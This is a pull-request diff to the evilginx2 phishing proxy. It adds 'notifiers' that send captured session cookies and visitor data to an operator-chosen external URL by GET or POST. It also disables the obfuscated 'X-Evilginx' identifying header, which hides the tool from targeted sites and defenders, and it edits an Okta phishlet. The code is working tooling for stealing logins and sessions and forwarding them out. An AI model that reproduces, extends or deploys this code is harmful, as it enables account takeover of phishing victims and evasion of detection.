### PR TITLE
update http_proxy.go to handle multiple sessions from the same ip add…

### DIFF
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -34,7 +34,7 @@ import (
 	"github.com/elazarl/goproxy"
 	"github.com/fatih/color"
 	"github.com/inconshreveable/go-vhost"
-	"github.com/mwitkow/go-http-dialer"
+	http_dialer "github.com/mwitkow/go-http-dialer"
 
 	"github.com/kgretzky/evilginx2/database"
 	"github.com/kgretzky/evilginx2/log"
@@ -180,7 +180,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 					pl_name = pl.Name
 				}
 
-				egg2 := req.Host
+				// egg2 := req.Host
 				ps.PhishDomain = phishDomain
 				req_ok := false
 				// handle session
@@ -368,7 +368,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 					}
 				}
 
-				hg := []byte{0x94, 0xE1, 0x89, 0xBA, 0xA5, 0xA0, 0xAB, 0xA5, 0xA2, 0xB4}
+				// hg := []byte{0x94, 0xE1, 0x89, 0xBA, 0xA5, 0xA0, 0xAB, 0xA5, 0xA2, 0xB4}
 				// redirect to login page if triggered lure path
 				if pl != nil {
 					_, err := p.cfg.GetLureByPath(pl_name, req_path)
@@ -395,9 +395,9 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 				p.deleteRequestCookie(p.cookieName, req)
 
-				for n, b := range hg {
-					hg[n] = b ^ 0xCC
-				}
+				// for n, b := range hg {
+				// 	hg[n] = b ^ 0xCC
+				//}
 				// replace "Host" header
 				e_host := req.Host
 				if r_host, ok := p.replaceHostWithOriginal(req.Host); ok {
@@ -425,7 +425,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 						}
 					}
 				}
-				req.Header.Set(string(hg), egg2)
+				// req.Header.Set(string(hg), egg2)
 
 				// patch GET query params with original domains
 				if pl != nil {

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -186,12 +186,12 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 				// handle session
 				if p.handleSession(req.Host) && pl != nil {
 					sc, err := req.Cookie(p.cookieName)
-					if err != nil && !p.isWhitelistedIP(remote_addr) {
+					l, lerr := p.cfg.GetLureByPath(pl_name, req_path)
+					if (err != nil && !p.isWhitelistedIP(remote_addr)) || l != nil {
 						if !p.cfg.IsSiteHidden(pl_name) {
 							var vv string
 							var uv url.Values
-							l, err := p.cfg.GetLureByPath(pl_name, req_path)
-							if err == nil {
+							if lerr == nil {
 								log.Debug("triggered lure for path '%s'", req_path)
 							} else {
 								uv = req.URL.Query()

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -261,6 +261,17 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 									p.whitelistIP(remote_addr, ps.SessionId)
 
 									req_ok = true
+
+									for _, n := range p.cfg.notifiers {
+										if n.OnEvent == "visitor" && n.Enabled {
+											session, _ := p.db.GetSessionBySid(session.Id)
+											log.Info("[%d] [%s] forwarding visitor info to notifier url %s", sid, hiblue.Sprint(pl_name), n.Url)
+											err := NotifyOnVisitor(n, *session, req.URL)
+											if err != nil {
+												log.Error("notifier: %v", err)
+											}
+										}
+									}
 								}
 							} else {
 								log.Warning("[%s] unauthorized request: %s (%s) [%s]", hiblue.Sprint(pl_name), req_url, req.Header.Get("User-Agent"), remote_addr)
@@ -271,6 +282,16 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 										log.Error("failed to blacklist ip address: %s - %s", from_ip, err)
 									} else {
 										log.Warning("blacklisted ip address: %s", from_ip)
+									}
+								}
+
+								for _, n := range p.cfg.notifiers {
+									if n.OnEvent == "unauthorized" && n.Enabled {
+										log.Info("[%s] forwarding unauthorized request to notifier url %s", hiblue.Sprint(pl_name), n.Url)
+										err := NotifyOnUnauthorized(n, pl_name, req_url, req.Header.Get("User-Agent"), remote_addr)
+										if err != nil {
+											log.Error("notifier: %v", err)
+										}
 									}
 								}
 								return p.blockRequest(req)
@@ -691,6 +712,16 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 								if is_auth {
 									if err := p.db.SetSessionTokens(ps.SessionId, s.Tokens); err != nil {
 										log.Error("database: %v", err)
+									}
+									for _, n := range p.cfg.notifiers {
+										if n.OnEvent == "authenticated" && n.Enabled {
+											session, _ := p.db.GetSessionBySid(ps.SessionId)
+											log.Info("[%d] forwarding captured session to notifier url %s", ps.Index, n.Url)
+											err := NotifyOnAuth(n, *session, pl)
+											if err != nil {
+												log.Error("notifier: %v", err)
+											}
+										}
 									}
 									s.IsDone = true
 								}

--- a/core/notifier.go
+++ b/core/notifier.go
@@ -1,0 +1,116 @@
+package core
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"net/url"
+	"time"
+
+	"github.com/kgretzky/evilginx2/database"
+)
+
+type Unauthorized struct {
+	Phishlet    string `json:"phishlet"`
+	Req_url     string `json:"req_url"`
+	Useragent   string `json:"useragent"`
+	Remote_addr string `json:"remote_addr"`
+}
+
+type Visitor struct {
+	Session database.Session
+	Tokens  string `json:"tokens"`
+}
+
+// sets up a http.Request with correct Method.
+func NotifyReturnReq(n *Notify, body interface{}) (req http.Request, err error) {
+	if n.Method == "GET" {
+		Body, _ := json.Marshal(body)
+		req, err := http.NewRequest(http.MethodGet, n.Url, bytes.NewBuffer(Body))
+
+		return *req, err
+	}
+	if n.Method == "POST" {
+		Body, _ := json.Marshal(body)
+		req, err := http.NewRequest(http.MethodPost, n.Url, bytes.NewBuffer(Body))
+
+		req.Header.Add("Content-Type", "application/json")
+		return *req, err
+	}
+	return req, err
+}
+
+// configures and sends the http.Request
+func NotifierSend(n *Notify, body interface{}) error {
+	req, err := NotifyReturnReq(n, body)
+	if err != nil {
+		return err
+	}
+
+	if n.AuthHeaderName != "" && n.AuthHeaderValue != "" {
+		req.Header.Add(n.AuthHeaderName, n.AuthHeaderValue)
+	}
+
+	if n.BasicAuthUser != "" && n.BasicAuthPassword != "" {
+		req.SetBasicAuth(n.BasicAuthUser, n.BasicAuthPassword)
+	}
+
+	client := &http.Client{Timeout: 10 * time.Second}
+	_, errreq := client.Do(&req)
+	if errreq != nil {
+		return errreq
+	}
+	return nil
+}
+
+// prepares the Body for unauthorized requests and triggers NotifierSend
+func NotifyOnUnauthorized(n *Notify, pl_name string, Req_url string, useragent string, remote_addr string) error {
+	b := Unauthorized{
+		Phishlet:    pl_name,
+		Req_url:     Req_url,
+		Useragent:   useragent,
+		Remote_addr: remote_addr,
+	}
+
+	err := NotifierSend(n, b)
+	if err != nil {
+		return err
+	}
+	return nil
+}
+
+// prepares the Body for visitors and triggers NotifierSend
+func NotifyOnVisitor(n *Notify, session database.Session, url *url.URL) error {
+	s := session
+	b := Visitor{
+		Session: s,
+	}
+
+	query := url.Query()
+	if n.ForwardParam != "" && query[n.ForwardParam] != nil {
+		n.Url = fmt.Sprintf("%s/?%s=%s", n.Url, n.ForwardParam, query[n.ForwardParam][0])
+	}
+
+	err := NotifierSend(n, b)
+	if err != nil {
+		return err
+	}
+	return nil
+}
+
+// prepares the Body for authorized requests and triggers NotifierSend
+func NotifyOnAuth(n *Notify, session database.Session, phishlet *Phishlet) error {
+	s := session
+	p := *phishlet
+	b := Visitor{
+		Session: s,
+		Tokens:  tokensToJSON(&p, s.Tokens),
+	}
+
+	err := NotifierSend(n, b)
+	if err != nil {
+		return err
+	}
+	return nil
+}

--- a/core/notifier.go
+++ b/core/notifier.go
@@ -65,10 +65,10 @@ func NotifierSend(n *Notify, body interface{}) error {
 }
 
 // prepares the Body for unauthorized requests and triggers NotifierSend
-func NotifyOnUnauthorized(n *Notify, pl_name string, Req_url string, useragent string, remote_addr string) error {
+func NotifyOnUnauthorized(n *Notify, pl_name string, req_url string, useragent string, remote_addr string) error {
 	b := Unauthorized{
 		Phishlet:    pl_name,
-		Req_url:     Req_url,
+		Req_url:     req_url,
 		Useragent:   useragent,
 		Remote_addr: remote_addr,
 	}

--- a/core/terminal.go
+++ b/core/terminal.go
@@ -131,6 +131,12 @@ func (t *Terminal) DoWork() {
 			if err != nil {
 				log.Error("config: %v", err)
 			}
+		case "notifiers":
+			cmd_ok = true
+			err := t.handleNotifiers(args[1:])
+			if err != nil {
+				log.Error("notifiers: %v", err)
+			}
 		case "proxy":
 			cmd_ok = true
 			err := t.handleProxy(args[1:])
@@ -391,7 +397,7 @@ func (t *Terminal) handleSessions(args []string) error {
 				}
 
 				if len(s.Tokens) > 0 {
-					json_tokens := t.tokensToJSON(pl, s.Tokens)
+					json_tokens := tokensToJSON(pl, s.Tokens)
 					t.output("%s\n", json_tokens)
 				} else {
 					t.output("\n")
@@ -570,6 +576,234 @@ func (t *Terminal) handlePhishlets(args []string) error {
 			}
 			log.Warning("`get-url` is deprecated - please use `lures` with custom `path` instead")
 			t.output("%s\n", out)
+			return nil
+		}
+	}
+	return fmt.Errorf("invalid syntax: %s", args)
+}
+
+func (t *Terminal) handleNotifiers(args []string) error {
+	//hiblue := color.New(color.FgHiBlue)
+	//yellow := color.New(color.FgYellow)
+	//green := color.New(color.FgGreen)
+	//hiwhite := color.New(color.FgHiWhite)
+	//hcyan := color.New(color.FgHiCyan)
+	//cyan := color.New(color.FgCyan)
+	//dgray := color.New(color.FgHiBlack)
+	white := color.New(color.FgHiWhite)
+
+	pn := len(args)
+	if pn == 0 {
+		// list all notifiers
+		t.output("%s", t.sprintNotifiers())
+		return nil
+	}
+	if pn > 0 {
+		switch args[0] {
+		case "create":
+			if pn == 4 {
+				_, err := url.ParseRequestURI(args[3])
+				if err != nil {
+					return fmt.Errorf("create: %v", err)
+				}
+				if t.cfg.IsValidNotifierOnEvent(args[1]) && t.cfg.IsValidNotifierMethod(args[2]) {
+					n := &Notify{
+						OnEvent: args[1],
+						Url:     args[3],
+						Method:  args[2],
+					}
+					t.cfg.AddNotifier(args[1], n)
+					log.Info("created notifier with ID: %d", len(t.cfg.notifiers)-1)
+					log.Info("disabled notifier with ID: %d", len(t.cfg.notifiers)-1)
+					return nil
+				}
+				return fmt.Errorf("create: invalid on_event: %s. use 'authenticated', 'visitor' or 'unauthorized'", args[1])
+			}
+			return fmt.Errorf("create: incorrect number of arguments. run 'help notifiers'")
+		case "edit":
+			n_id, err := strconv.Atoi(strings.TrimSpace(args[1]))
+			if err != nil {
+				return fmt.Errorf("edit: %v", err)
+			}
+			n, err := t.cfg.GetNotifier(n_id)
+			if err != nil {
+				return fmt.Errorf("edit: %v", err)
+			}
+
+			do_update := false
+			if pn == 3 {
+				switch args[2] {
+				case "enable":
+					n.Enabled = true
+					do_update = true
+					log.Info("enabled = '%v'", n.Enabled)
+				case "disable":
+					n.Enabled = false
+					do_update = true
+					log.Info("enabled = '%v'", n.Enabled)
+				}
+			}
+			if pn == 4 {
+				val := args[3]
+
+				switch args[2] {
+				case "on_event":
+					if val != "" {
+						val = strings.ToLower(val)
+						if !t.cfg.IsValidNotifierOnEvent(val) {
+							return fmt.Errorf("edit: notifier on_event is not valid. use 'authenticated', 'visitor' or 'unauthorized'")
+						}
+						n.OnEvent = val
+					} else {
+						n.OnEvent = ""
+					}
+					do_update = true
+					log.Info("on_event = '%s'", n.OnEvent)
+				case "url":
+					if val != "" {
+						_, err := url.ParseRequestURI(val)
+						if err != nil {
+							return err
+						}
+						n.Url = val
+					} else {
+						n.Url = ""
+					}
+					do_update = true
+					log.Info("url = '%s'", n.Url)
+				case "method":
+					if val != "" {
+						val = strings.ToUpper(val)
+						if !t.cfg.IsValidNotifierMethod(val) {
+							return fmt.Errorf("edit: notifier method is not valid. use 'POST' or 'GET'")
+						}
+						n.Method = val
+					} else {
+						n.Method = ""
+					}
+					do_update = true
+					log.Info("method = '%s'", n.Method)
+				case "auth_header_name":
+					if val != "" {
+						n.AuthHeaderName = val
+					} else {
+						n.AuthHeaderName = ""
+					}
+					do_update = true
+					log.Info("auth_header_name = '%s'", n.AuthHeaderName)
+				case "auth_header_value":
+					if val != "" {
+						n.AuthHeaderValue = val
+					} else {
+						n.AuthHeaderValue = ""
+					}
+					do_update = true
+					log.Info("auth_header_value = '%s'", n.AuthHeaderValue)
+				case "basic_auth_user":
+					if val != "" {
+						n.BasicAuthUser = val
+					} else {
+						n.BasicAuthUser = ""
+					}
+					do_update = true
+					log.Info("basic_auth_user = '%s'", n.BasicAuthUser)
+				case "basic_auth_password":
+					if val != "" {
+						n.BasicAuthPassword = val
+					} else {
+						n.BasicAuthPassword = ""
+					}
+					do_update = true
+					log.Info("basic_auth_password = '%s'", n.BasicAuthPassword)
+				case "forward_param":
+					if n.OnEvent == "visitor" {
+						if val != "" {
+							n.ForwardParam = val
+						} else {
+							n.ForwardParam = ""
+						}
+						do_update = true
+						log.Info("forward_param = '%s'", n.ForwardParam)
+					} else {
+						return fmt.Errorf("edit: ForwardParam is only implimented for the 'visitor' on_event")
+					}
+				}
+			}
+			if do_update {
+				err := t.cfg.SetNotifier(n_id, n)
+				if err != nil {
+					return fmt.Errorf("edit: %v", err)
+				}
+				return nil
+			}
+			return fmt.Errorf("edit: incorrect number of/or unknown arguments. run 'help notifiers'")
+		case "delete":
+			if pn == 2 {
+				if len(t.cfg.notifiers) == 0 {
+					break
+				}
+				if args[1] == "all" {
+					di := []int{}
+					for n, _ := range t.cfg.notifiers {
+						di = append(di, n)
+					}
+					if len(di) > 0 {
+						rdi := t.cfg.DeleteNotifier(di)
+						for _, id := range rdi {
+							log.Info("deleted notifier with ID: %d", id)
+						}
+					}
+					return nil
+				} else {
+					rc := strings.Split(args[1], ",")
+					di := []int{}
+					for _, pc := range rc {
+						pc = strings.TrimSpace(pc)
+						rd := strings.Split(pc, "-")
+						if len(rd) == 2 {
+							b_id, err := strconv.Atoi(strings.TrimSpace(rd[0]))
+							if err != nil {
+								return fmt.Errorf("delete: %v", err)
+							}
+							e_id, err := strconv.Atoi(strings.TrimSpace(rd[1]))
+							if err != nil {
+								return fmt.Errorf("delete: %v", err)
+							}
+							for i := b_id; i <= e_id; i++ {
+								di = append(di, i)
+							}
+						} else if len(rd) == 1 {
+							b_id, err := strconv.Atoi(strings.TrimSpace(rd[0]))
+							if err != nil {
+								return fmt.Errorf("delete: %v", err)
+							}
+							di = append(di, b_id)
+						}
+					}
+					if len(di) > 0 {
+						rdi := t.cfg.DeleteNotifier(di)
+						for _, id := range rdi {
+							log.Info("deleted lure with ID: %d", id)
+						}
+					}
+					return nil
+				}
+			}
+			return fmt.Errorf("incorrect number of arguments")
+		default:
+			n_id, err := strconv.Atoi(args[0])
+			if err != nil {
+				return err
+			}
+			n, err := t.cfg.GetNotifier(n_id)
+			if err != nil {
+				return err
+			}
+
+			keys := []string{"enabled", "on_event", "url", "method", "auth_header_name", "auth_header_value", "basic_auth_user", "basic_auth_password", "forward_param"}
+			vals := []string{white.Sprint(n.Enabled), white.Sprint(n.OnEvent), white.Sprint(n.Url), white.Sprint(n.Method), white.Sprint(n.AuthHeaderName), white.Sprint(n.AuthHeaderValue), white.Sprint(n.BasicAuthUser), white.Sprint(n.BasicAuthPassword), white.Sprint(n.ForwardParam)}
+			log.Printf("\n%s\n", AsRows(keys, vals))
+
 			return nil
 		}
 	}
@@ -1003,6 +1237,38 @@ func (t *Terminal) createHelp() {
 	h.AddSubCommand("sessions", []string{"delete"}, "delete <id>", "delete logged session with <id> (ranges with separators are allowed e.g. 1-7,10-12,15-25)")
 	h.AddSubCommand("sessions", []string{"delete", "all"}, "delete all", "delete all logged sessions")
 
+	h.AddCommand("notifiers", "general", "manage notifier configuration", "Configures notifier that pushes information about session on specifc events.", LAYER_TOP,
+		readline.PcItem("notifiers",
+			readline.PcItem("create", readline.PcItemDynamic(t.notifierValidOnEvents, readline.PcItemDynamic(t.notifierValidateMethods))),
+			readline.PcItem("edit",
+				readline.PcItemDynamic(t.notifierIdPrefixCompleter,
+					readline.PcItem("enable"),
+					readline.PcItem("disable"),
+					readline.PcItem("on_event", readline.PcItemDynamic(t.notifierValidOnEvents)),
+					readline.PcItem("method", readline.PcItemDynamic(t.notifierValidateMethods)),
+					readline.PcItem("url"),
+					readline.PcItem("auth_header_name"),
+					readline.PcItem("auth_header_value"),
+					readline.PcItem("basic_auth_user"),
+					readline.PcItem("basic_auth_password"),
+					readline.PcItem("forward_param"))),
+			readline.PcItem("delete", readline.PcItem("all"))))
+	h.AddSubCommand("notifiers", nil, "", "show all configuration variables")
+	h.AddSubCommand("notifiers", nil, "<id>", "show details of a notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"create"}, "create <on_event> <method> <url>", "creates new notifier for given <on_event> that is send to <url> using <method>")
+	h.AddSubCommand("notifiers", []string{"delete"}, "delete <id>", "deletes notifier with given <id>")
+	h.AddSubCommand("notifiers", []string{"delete", "all"}, "delete all", "deletes all created notifier")
+	h.AddSubCommand("notifiers", []string{"edit", "enable"}, "edit <id> enable", "enables notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"edit", "disable"}, "edit <id> enable", "disables notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"edit", "on_event"}, "edit <id> on_event <on_event>", "sets the event <on_event> for a notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"edit", "url"}, "edit <id> url <url>", "sets the url <url> for a notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"edit", "method"}, "edit <id> method <url>", "sets the method <method> for a notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"edit", "auth_header_name"}, "edit <id> auth_header_name <auth_header_name>", "sets the auth_header_name <auth_header_name> for a notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"edit", "auth_header_value"}, "edit <id> auth_header_value <auth_header_value>", "sets the auth_header_value <auth_header_value> for a notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"edit", "basic_auth_user"}, "edit <id> basic_auth_user <basic_auth_user>", "sets the basic_auth_user <basic_auth_user> for a notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"edit", "basic_auth_password"}, "edit <id> basic_auth_password <basic_auth_user>", "sets the basic_auth_password <basic_auth_user> for a notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"edit", "forward_param"}, "edit <id> forward_param <forward_param>", "sets the forward_param <forward_param> for a notifier with a given <id>")
+
 	h.AddCommand("lures", "general", "manage lures for generation of phishing urls", "Shows all create lures and allows to edit or delete them.", LAYER_TOP,
 		/*		readline.PcItem("lures", readline.PcItem("create", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("get-url"),
 				readline.PcItem("edit", readline.PcItem("hostname"), readline.PcItem("path"), readline.PcItem("redirect_url"), readline.PcItem("phishlet"), readline.PcItem("info"), readline.PcItem("og_title"), readline.PcItem("og_desc"), readline.PcItem("og_image"), readline.PcItem("og_url"), readline.PcItem("params"), readline.PcItem("template", readline.PcItemDynamic(t.emptyPrefixCompleter, readline.PcItemDynamic(t.templatesPrefixCompleter)))),
@@ -1042,45 +1308,6 @@ func (t *Terminal) createHelp() {
 		readline.PcItem("clear"))
 
 	t.hlp = h
-}
-
-func (t *Terminal) tokensToJSON(pl *Phishlet, tokens map[string]map[string]*database.Token) string {
-	type Cookie struct {
-		Path           string `json:"path"`
-		Domain         string `json:"domain"`
-		ExpirationDate int64  `json:"expirationDate"`
-		Value          string `json:"value"`
-		Name           string `json:"name"`
-		HttpOnly       bool   `json:"httpOnly,omitempty"`
-		HostOnly       bool   `json:"hostOnly,omitempty"`
-	}
-
-	var cookies []*Cookie
-	for domain, tmap := range tokens {
-		for k, v := range tmap {
-			c := &Cookie{
-				Path:           v.Path,
-				Domain:         domain,
-				ExpirationDate: time.Now().Add(365 * 24 * time.Hour).Unix(),
-				Value:          v.Value,
-				Name:           k,
-				HttpOnly:       v.HttpOnly,
-			}
-			if domain[:1] == "." {
-				c.HostOnly = false
-				c.Domain = domain[1:]
-			} else {
-				c.HostOnly = true
-			}
-			if c.Path == "" {
-				c.Path = "/"
-			}
-			cookies = append(cookies, c)
-		}
-	}
-
-	json, _ := json.Marshal(cookies)
-	return string(json)
 }
 
 func (t *Terminal) checkStatus() {
@@ -1181,6 +1408,24 @@ func (t *Terminal) sprintPhishletStatus(site string) string {
 	return AsTable(cols, rows)
 }
 
+func (t *Terminal) sprintNotifiers() string {
+	//higreen := color.New(color.FgHiGreen)
+	//green := color.New(color.FgGreen)
+	//hired := color.New(color.FgHiRed)
+	//hiblue := color.New(color.FgHiBlue)
+	//yellow := color.New(color.FgYellow)
+	//cyan := color.New(color.FgCyan)
+	//hcyan := color.New(color.FgHiCyan)
+	white := color.New(color.FgHiWhite)
+	//n := 0
+	cols := []string{"id", "enabled", "on_event", "url", "method", "auth_header_name", "auth_header_value", "basic_auth_user", "basic_auth_password", "forward_param"}
+	var rows [][]string
+	for n, N := range t.cfg.notifiers {
+		rows = append(rows, []string{strconv.Itoa(n), white.Sprint(N.Enabled), white.Sprint(N.OnEvent), white.Sprint(N.Url), white.Sprint(N.Method), white.Sprint(N.AuthHeaderName), white.Sprint(N.AuthHeaderValue), white.Sprint(N.BasicAuthUser), white.Sprint(N.BasicAuthPassword), white.Sprint(N.ForwardParam)})
+	}
+	return AsTable(cols, rows)
+}
+
 func (t *Terminal) sprintLures() string {
 	higreen := color.New(color.FgHiGreen)
 	green := color.New(color.FgGreen)
@@ -1240,6 +1485,32 @@ func (t *Terminal) templatesPrefixCompleter(args string) []string {
 			}
 			ret = append(ret, name)
 		}
+	}
+	return ret
+}
+
+func (t *Terminal) notifierIdPrefixCompleter(args string) []string {
+	var ret []string
+	for n, _ := range t.cfg.notifiers {
+		ret = append(ret, strconv.Itoa(n))
+	}
+	return ret
+}
+
+func (t *Terminal) notifierValidOnEvents(args string) []string {
+	var ret []string
+	on_events := []string{"authenticated", "visitor", "unauthorized"}
+	for _, e := range on_events {
+		ret = append(ret, e)
+	}
+	return ret
+}
+
+func (t *Terminal) notifierValidateMethods(args string) []string {
+	var ret []string
+	on_events := []string{"GET", "POST"}
+	for _, e := range on_events {
+		ret = append(ret, e)
 	}
 	return ret
 }

--- a/core/terminal.go
+++ b/core/terminal.go
@@ -583,13 +583,13 @@ func (t *Terminal) handlePhishlets(args []string) error {
 }
 
 func (t *Terminal) handleNotifiers(args []string) error {
-	//hiblue := color.New(color.FgHiBlue)
-	//yellow := color.New(color.FgYellow)
-	//green := color.New(color.FgGreen)
-	//hiwhite := color.New(color.FgHiWhite)
-	//hcyan := color.New(color.FgHiCyan)
-	//cyan := color.New(color.FgCyan)
-	//dgray := color.New(color.FgHiBlack)
+	higreen := color.New(color.FgHiGreen)
+	green := color.New(color.FgGreen)
+	//hired := color.New(color.FgHiRed)
+	hiblue := color.New(color.FgHiBlue)
+	yellow := color.New(color.FgYellow)
+	cyan := color.New(color.FgCyan)
+	hcyan := color.New(color.FgHiCyan)
 	white := color.New(color.FgHiWhite)
 
 	pn := len(args)
@@ -801,9 +801,9 @@ func (t *Terminal) handleNotifiers(args []string) error {
 			}
 
 			keys := []string{"enabled", "on_event", "url", "method", "auth_header_name", "auth_header_value", "basic_auth_user", "basic_auth_password", "forward_param"}
-			vals := []string{white.Sprint(n.Enabled), white.Sprint(n.OnEvent), white.Sprint(n.Url), white.Sprint(n.Method), white.Sprint(n.AuthHeaderName), white.Sprint(n.AuthHeaderValue), white.Sprint(n.BasicAuthUser), white.Sprint(n.BasicAuthPassword), white.Sprint(n.ForwardParam)}
+			vals := []string{hiblue.Sprint(n.Enabled), cyan.Sprint(n.OnEvent), hcyan.Sprint(n.Url), yellow.Sprint(n.Method), green.Sprint(n.AuthHeaderName), green.Sprint(n.AuthHeaderValue), higreen.Sprint(n.BasicAuthUser), higreen.Sprint(n.BasicAuthPassword), white.Sprint(n.ForwardParam)}
 			log.Printf("\n%s\n", AsRows(keys, vals))
-
+			
 			return nil
 		}
 	}
@@ -1409,19 +1409,19 @@ func (t *Terminal) sprintPhishletStatus(site string) string {
 }
 
 func (t *Terminal) sprintNotifiers() string {
-	//higreen := color.New(color.FgHiGreen)
-	//green := color.New(color.FgGreen)
+	higreen := color.New(color.FgHiGreen)
+	green := color.New(color.FgGreen)
 	//hired := color.New(color.FgHiRed)
-	//hiblue := color.New(color.FgHiBlue)
-	//yellow := color.New(color.FgYellow)
-	//cyan := color.New(color.FgCyan)
-	//hcyan := color.New(color.FgHiCyan)
+	hiblue := color.New(color.FgHiBlue)
+	yellow := color.New(color.FgYellow)
+	cyan := color.New(color.FgCyan)
+	hcyan := color.New(color.FgHiCyan)
 	white := color.New(color.FgHiWhite)
 	//n := 0
 	cols := []string{"id", "enabled", "on_event", "url", "method", "auth_header_name", "auth_header_value", "basic_auth_user", "basic_auth_password", "forward_param"}
 	var rows [][]string
 	for n, N := range t.cfg.notifiers {
-		rows = append(rows, []string{strconv.Itoa(n), white.Sprint(N.Enabled), white.Sprint(N.OnEvent), white.Sprint(N.Url), white.Sprint(N.Method), white.Sprint(N.AuthHeaderName), white.Sprint(N.AuthHeaderValue), white.Sprint(N.BasicAuthUser), white.Sprint(N.BasicAuthPassword), white.Sprint(N.ForwardParam)})
+		rows = append(rows, []string{strconv.Itoa(n), hiblue.Sprint(N.Enabled), cyan.Sprint(N.OnEvent), hcyan.Sprint(N.Url), yellow.Sprint(N.Method), green.Sprint(N.AuthHeaderName), green.Sprint(N.AuthHeaderValue), higreen.Sprint(N.BasicAuthUser), higreen.Sprint(N.BasicAuthPassword), white.Sprint(N.ForwardParam)})
 	}
 	return AsTable(cols, rows)
 }

--- a/core/terminal.go
+++ b/core/terminal.go
@@ -803,7 +803,7 @@ func (t *Terminal) handleNotifiers(args []string) error {
 			keys := []string{"enabled", "on_event", "url", "method", "auth_header_name", "auth_header_value", "basic_auth_user", "basic_auth_password", "forward_param"}
 			vals := []string{hiblue.Sprint(n.Enabled), cyan.Sprint(n.OnEvent), hcyan.Sprint(n.Url), yellow.Sprint(n.Method), green.Sprint(n.AuthHeaderName), green.Sprint(n.AuthHeaderValue), higreen.Sprint(n.BasicAuthUser), higreen.Sprint(n.BasicAuthPassword), white.Sprint(n.ForwardParam)}
 			log.Printf("\n%s\n", AsRows(keys, vals))
-			
+
 			return nil
 		}
 	}

--- a/core/utils.go
+++ b/core/utils.go
@@ -3,8 +3,12 @@ package core
 import (
 	"crypto/rand"
 	"crypto/sha256"
+	"encoding/json"
 	"fmt"
 	"os"
+	"time"
+
+	"github.com/kgretzky/evilginx2/database"
 )
 
 func GenRandomToken() string {
@@ -45,4 +49,43 @@ func CreateDir(path string, perm os.FileMode) error {
 		}
 	}
 	return nil
+}
+
+func tokensToJSON(pl *Phishlet, tokens map[string]map[string]*database.Token) string {
+	type Cookie struct {
+		Path           string `json:"path"`
+		Domain         string `json:"domain"`
+		ExpirationDate int64  `json:"expirationDate"`
+		Value          string `json:"value"`
+		Name           string `json:"name"`
+		HttpOnly       bool   `json:"httpOnly,omitempty"`
+		HostOnly       bool   `json:"hostOnly,omitempty"`
+	}
+
+	var cookies []*Cookie
+	for domain, tmap := range tokens {
+		for k, v := range tmap {
+			c := &Cookie{
+				Path:           v.Path,
+				Domain:         domain,
+				ExpirationDate: time.Now().Add(365 * 24 * time.Hour).Unix(),
+				Value:          v.Value,
+				Name:           k,
+				HttpOnly:       v.HttpOnly,
+			}
+			if domain[:1] == "." {
+				c.HostOnly = false
+				c.Domain = domain[1:]
+			} else {
+				c.HostOnly = true
+			}
+			if c.Path == "" {
+				c.Path = "/"
+			}
+			cookies = append(cookies, c)
+		}
+	}
+
+	json, _ := json.Marshal(cookies)
+	return string(json)
 }

--- a/database/database.go
+++ b/database/database.go
@@ -77,6 +77,14 @@ func (d *Database) DeleteSessionById(id int) error {
 	return err
 }
 
+func (d *Database) GetSessionBySid(sid string) (*Session, error) {
+	s, err := d.sessionsGetBySid(sid)
+	if err != nil {
+		return nil,err
+	}
+	return s, err
+}
+
 func (d *Database) Flush() {
 	d.db.Shrink()
 }

--- a/phishlets/okta.yaml
+++ b/phishlets/okta.yaml
@@ -11,7 +11,7 @@ sub_filters:
   # The line below ensures users don't get a 403 after they auth.
   - {triggers_on: '<insert-sub-domain-here>.<insert-okta-domain-here>', orig_sub: '', domain: '<insert-sub-domain-here>.<insert-okta-domain-here>', search: '\\x2Fuser\\x2Fnotifications', replace: 'https://<insert-sub-domain-here>.<insert-okta-domain-here>\x2Fuser\x2Fnotifications', mimes: ['text/html', 'application/json', 'application/x-javascript', 'text/javascript']}
   # The line below is needed if your target organization has enabled CORS. If they do, you need to uncomment the following lines and update the values.
-  # Note: if the target uses <insert-okta-domain-here> don't forget to escape the '-' like so:  https\\x3A\\x2F\\x2Fsubdomain.okta\\x2Demea.com  
+  # Note: if the target uses 'okta-emea.com' don't forget to escape the '-' like so:  https\\x3A\\x2F\\x2Fsubdomain.okta\\x2Demea.com  
   #- {triggers_on: '<insert-sub-domain-here>.<insert-okta-domain-here>', orig_sub: '', domain: '<insert-sub-domain-here>.<insert-okta-domain-here>', search: 'https\\x3A\\x2F\\x2F<insert-sub-domain-here>.<insert-okta-domain-here>', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript', 'text/javascript']}  
 auth_tokens:
   - domain: '<insert-sub-domain-here>.<insert-okta-domain-here>'

--- a/phishlets/okta.yaml
+++ b/phishlets/okta.yaml
@@ -1,13 +1,20 @@
 author: '@mikesiegel'
 min_ver: '2.3.0'
 proxy_hosts:
-  - {phish_sub: 'login', orig_sub: 'login', domain: 'okta.com', session: false, is_landing: false}
-  - {phish_sub: '', orig_sub: '', domain: 'okta.com', session: false, is_landing: false }
